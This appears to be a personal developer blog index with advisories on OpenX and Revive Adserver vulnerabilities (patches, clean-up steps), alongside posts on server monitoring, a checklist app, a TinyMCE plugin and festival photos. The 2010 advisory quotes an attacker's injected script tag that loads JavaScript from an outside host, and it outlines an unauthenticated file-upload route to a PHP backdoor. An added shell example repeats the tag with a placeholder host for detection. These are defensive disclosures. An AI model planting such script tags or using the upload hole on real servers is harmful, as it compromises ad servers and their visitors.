10. January 2017

List of Tools for Monitoring Windows Server Performance

Is your Windows Server still running as smoothly as expected? There is a wide range of tools that help you monitor server performance. I have compiled an extensive list of such monitoring tools for Windows servers:

» 40 Windows Server Performance Monitoring Tools

22. April 2016

10 Easily Preventable Server Failures Every Sysadmin Should Frequently Check For

Monitoring servers is no trivial task. There are plenty of things that can go wrong, many of them quite unexpected. A few things, however, can be checked within seconds and still would cause great pain if left unchecked.

Be sure to keep an eye on these 10 easily preventable server failures.

Keywords: devops, IT, monitoring, server monitoring, sysadmin

18. December 2013

Zero Day Vulnerability in OpenX Source 2.8.11 and Revive Adserver 3.0.1

The current versions of the popular ad server software OpenX Source (2.8.11) and Revive Adserver (3.0.1) are vulnerable to a SQL injection attack which allows attackers to gain backend access. The vulnerability is actively being exploited.

The OpenX team has been informed. For Revive, I submitted a pull request with a fix.

Since Revive Adserver is the official successor to OpenX Source, I assume that there will not be an updated version of OpenX Source (after all, there wasn’t one for the last vulnerability). I have created a set of patched files which fix the vulnerability in OpenX 2.8.11: openx-2.8.11-sql-injection-patch.zip. To patch Revive Adserver, use the files from revive-3.0.1-sql-injection-patch.zip.

I recommend applying the patches immediately, since the vulnerability is actively being exploited and has been for some time now.

Update 19.12.: The Revive team confirmed the vulnerability and is working on a fixed version.
Update 20.12.: The Revive team released Revive Adserver 3.0.2, which fixes the vulnerability. If possible, I recommend updating to this version as soon as possible (including users of OpenX). Thanks a lot to the team for the quick reaction!
The Revive team also suggests a quicker temporary fix for people who cannot update right away: Remove “www/delivery/axmlrpc.php” if you do not need xmlrpc delivery (most setups use different delivery methods).
Update 3.2.2014: Removing axmlrpc.php alone does not seem to be enough to fully protect an installation. dxmlrpc.php should be removed as well. Many thanks to Péter Veres for the discovery!

By the way

If you are managing an OpenX Source or Revive Adserver installation, take a look at the OpenX Maintenance Checklist or Revive Adserver Maintenance Checklist. It helps you keep track of frequent maintenance tasks and security checks. If you sign up for an account at Checkpanel (not required) you can easily manage this checklist. You can see when you last checked each item, set reminders, work in teams and more. Checkpanel is not limited to OpenX/Revive checklists – it helps you manage all kinds of recurring tasks (see some other samples and features).

(This article is also available in German)

11. September 2013

Zero-day Vulnerability in OpenX Source 2.8.11

The current version of the popular ad server software OpenX Source (2.8.11) is vulnerable to code injection attacks by a subset of registered users. The vulnerability is being actively exploited.

The problem can be fixed by changing line 311 in lib/OX/Extension/deliveryLimitations/DeliveryLimitations.php as follows:

// Fix: wrap both values in addslashes() so that quotes inside them cannot break out of the generated string
$result = 'MAX_check' . ucfirst($this->group) . '_' . $this->component . "('".addslashes($data)."', '".addslashes($this->comparison)."')";

Users of OpenX should apply this fix immediately, even if only trusted parties have access to the installation. The vulnerability is used in conjunction with other vulnerabilities to gain system access through hijacked accounts.

Revive Adserver (a fork of OpenX source) is vulnerable as well. I have submitted a pull request. Update: The Revive team confirmed the issue and accepted my patch on the same day.

By the way

If you are managing an OpenX ad server installation, take a look at the OpenX Maintenance Checklist. It helps you keep track of frequent maintenance tasks and security checks. If you sign up for an account at Checkpanel (not required) you can easily manage this checklist. You can see when you last checked each item, set reminders, work in teams and more. Checkpanel is not limited to OpenX checklists – it helps you manage all kinds of recurring tasks (see some other samples and features).

(This article is also available in German)

Keywords: OpenX, security

28. May 2013

Checkpanel – Continuous Checklists

Checkpanel screenshot

My new project, Checkpanel, went into public beta recently. Checkpanel is a checklist application which focuses on repeating checks. Unlike traditional checklists, Checkpanel keeps track of all reported checks (marking something as working or not working). You can see who last checked a test case, when, and what the errors were. You can also let some checks be executed automatically and set reminders for when you would like to check something again. And much more.

I imagined it primarily for use in quality assurance of web apps, for example when you frequently want to check if a recent change broke the contact form or had similar side effects. Of course you can also use it for anything else which needs to be checked frequently. Checkpanel can be used for test case management, regression testing, manual testing, smoke testing and much more.

https://checkpanel.com/ – go try it! :) I’m happy about every beta tester.

9. September 2010

Critical vulnerability in OpenX 2.8.6 & Open Flash Chart 2

There is a critical security flaw in OpenX 2.8.6 (and 2.8.5 and probably several earlier versions) which allows attackers to gain control of the webserver account and thus the adserver. The security hole is being actively exploited in the wild (as I learned the hard way). It seems that this hole is only known to attackers (in the OpenX context) at the moment, since I was not able to find any warning or other reference to it.

The problem lies in the following file:


The file ships with the video plugin. It is a component of Open Flash Chart 2 which is already known to be vulnerable. Basically, it allows an attacker to upload any file to the server including executables. This way, the attacker uploads a php backdoor and gains full access to the webserver account. From there he can (amongst other things) take control over the OpenX installation.

In our case, the attacker created a new admin user in the OpenX database called “root”. Interestingly, this user was not shown anywhere in the user accounts. But it did show up in the user log when he appended the following malicious script to one of our ad zones:

<script type="text/javascript" src="http://keyserveronline.com:8080/File.js"></script>

Interestingly, this vulnerability is also still present in the latest version of Open Flash Chart 2. It wouldn’t be hard to fix, but seemingly no one has bothered to release a fix yet. Me neither, since I do not need this component. A simple workaround is to delete ofc_upload_image.php. The core features of OpenX should not be affected, since this file seems to be connected to reports of the video plugin and might even be unused (it is part of a larger library). Alternatively, access to the file can be restricted via .htaccess to trusted users.

I highly recommend doing this immediately, since this vulnerability is being actively exploited.

Also check for signs of an already installed backdoor. In our case, the attacker closed the vulnerability himself (presumably so that no one else could take control of his loot), so take a look at the file before deleting it and compare it with the one that ships with OpenX. If it has been edited, you have probably already been hacked and a backdoor is installed.

What to do once the server has been hacked (Update 11.9.2010)

If you think your server has been compromised, you need to make sure that you get rid of all backdoors that might have been hidden in your system. Finding a backdoor in a compromised OpenX is tricky at best, so it is better to get rid of the original installation completely.

Re-install OpenX and apply the fix mentioned above. Do not keep any files of the old installation. Delete or archive everything that you did not install freshly from a trusted source.

Check your database. Take a look at the table ox_users and delete every entry that does not represent a trusted user. Check the prepend and append fields of all banners and zones. Remove suspicious code.

Change your passwords.

If you want to be absolutely sure, you would have to re-install the whole server, because it might have been rooted. But if your server was configured securely and did not contain any vulnerabilities that can be exploited by local users, the chances of this are moderately low. Decide for yourself if you want to take this time-consuming measure.
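As an added example (not code from the original post), two shell checks that support the clean-up steps above: comparing the installed ofc_upload_image.php with a trusted copy, and scanning an export of the banner/zone prepend and append fields for externally loaded scripts. The file paths, the placeholder attacker host and the sample dump are assumptions constructed for this demonstration.

```shell
#!/bin/sh
# Added example, not part of the original post: two checks that support the
# clean-up steps above. Paths and the sample dump are constructed here; real
# paths depend on where OpenX is installed.

# Returns 0 if the installed file is byte-identical to a trusted copy (the
# same file from a freshly downloaded OpenX archive), 1 if it differs, which
# the post treats as a sign that the file was edited by an attacker, and 2 if
# the installed file is missing.
compare_with_pristine() {
    installed="$1"
    pristine="$2"
    [ -f "$installed" ] || return 2
    cmp -s "$installed" "$pristine" || return 1
    return 0
}

# Counts records in a text export of the banner/zone prepend and append
# columns (one record per line) that load JavaScript from an external host.
# Prints the count; returns 0 when it is zero, 1 otherwise, 2 if unreadable.
count_external_script_tags() {
    [ -r "$1" ] || return 2
    n=$(grep -icE "<script[^>]*src=[\"']*https?://" "$1") || true
    echo "$n"
    [ "$n" -eq 0 ]
}

# Demonstration on constructed data: one harmless record, one injected tag
# (attacker host replaced by a placeholder).
demo() {
    dump=$(mktemp)
    printf '%s\n' \
        '<!-- legitimate prepend code -->' \
        '<script type="text/javascript" src="http://attacker.invalid:8080/File.js"></script>' \
        > "$dump"
    echo "external script tags found: $(count_external_script_tags "$dump" || true)"
    rm -f "$dump"
}

demo
```

The ox_users review from the steps above is a manual database query and is not covered by this script.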

Keywords: OpenX, security, web development

12. July 2009

bbPress compatibility plugin for TinyMCE

I’m currently using the WYSIWYG editor TinyMCE with bbPress for a project. Unfortunately, bbPress doesn’t like it when it gets <p> tags through TinyMCE and therefore messes up the post. I have written an (extremely) simple plugin for TinyMCE which transforms <p>s into double linebreaks before posting, thereby preserving compatibility. <br />s are transformed into single linebreaks.

The plugin is based on the BBCode plugin by Moxiecode Systems AB distributed together with TinyMCE, so they deserve most of the credit. I only adjusted a few replacement calls.

Currently there is one disadvantage: When you want to edit an existing post, double linebreaks are not converted back into <p>s, but into double <br />s. This usually looks just fine, but is not perfect.


Unpack the zip file into the TinyMCE plugins folder. Add “bbpress” to the list of activated plugins.
Important: Also set remove_linebreaks to false, or all linebreaks will get removed by TinyMCE.


bbPress Plugin for TinyMCE 0.2
bbPress Plugin for TinyMCE 0.1

Keywords: bbPress, plugins, TinyMCE

9. March 2009

Music Intersector Now With Up to Five Users

Some time ago, I created a little addon to Last.fm called Music Intersector. It shows which bands are common between the favorites of two users. As you might have noticed, Last.fm has integrated this functionality into its own system, so my old music intersector became a bit pointless.

Not anymore. I just updated it and it can now show the musical similarities between up to five users. Perfect for small parties and gatherings. :)

» Music Intersector

Unfortunately, the number of results declines extremely rapidly with more than two users. There is not much that I can do about it, since Last.fm only offers access to the top 50 artists and not the whole profile.

Keywords: intersection, last.fm, music, recommendation

7. February 2009

Ars Electronica Festival 2008: Photos, Impressions and Links

Ars Electronica 2008

Last year, I was at the Ars Electronica Festival in Linz, Austria. Unfortunately, I was too busy with beyond vision to post my impressions immediately, but now I’m going to make up for it. In the months that have passed, my memory of the event has faded a bit, but I’ll do my best to convey an adequate overview, with the help of tons of pictures.

All in all, I was not as impressed by the festival in 2008 as I was in 2007. In part, this is because I visited the Ars Electronica Center exhibition for the first time in 2007. That exhibition is one of the greatest, but it did not change a lot from 2007 to 2008, so it was kinda “old news” for me this time.

By the way, visiting the Ars Electronica Festival on a Saturday turned out not to be a problem. At first I was worried that the exhibitions would be overcrowded on the weekend, but it wasn’t much different than on the weekday the year before. The decision not to buy a day ticket was also right. I spent much less on single exhibition fees than a day ticket would have cost.

And now for the pictures…

» read on!

(This article is also available in German)

Keywords: Ars Electronica, art, Austria, exhibition, festival, Linz, photos, report

19. January 2009

beyond vision

There is one project that I was working on, but never found the time to tell you about: beyond vision. It is the largest project that I have done so far and it required so much time that I didn’t have any time left to write about it. :) But in December it was finally completed, so now there is time to tell:

18 musicians, 7 huge screens. beyond vision is the fusion of music and film – not just music with visual support and not just film with film music. Together both media tell an abstract story like it would not be possible for each medium alone.

I already set up a small page full with information about this project, so I will not copy it here. If you are interested, just take a look at the following link:

» beyond vision

I am sorry that I did not have the time to mention this project earlier. I guessed that most of you are probably not from Germany so the tour dates would probably not have been very interesting for you. :) And now, at least I have some more material to show you (don’t miss the photos).

I hope I will be able to show you some more background information soon. A documentary is already in the making, so hopefully I can show you some video footage from the performances sometime…

Keywords: beyond vision, concert, installation, meta, music, video
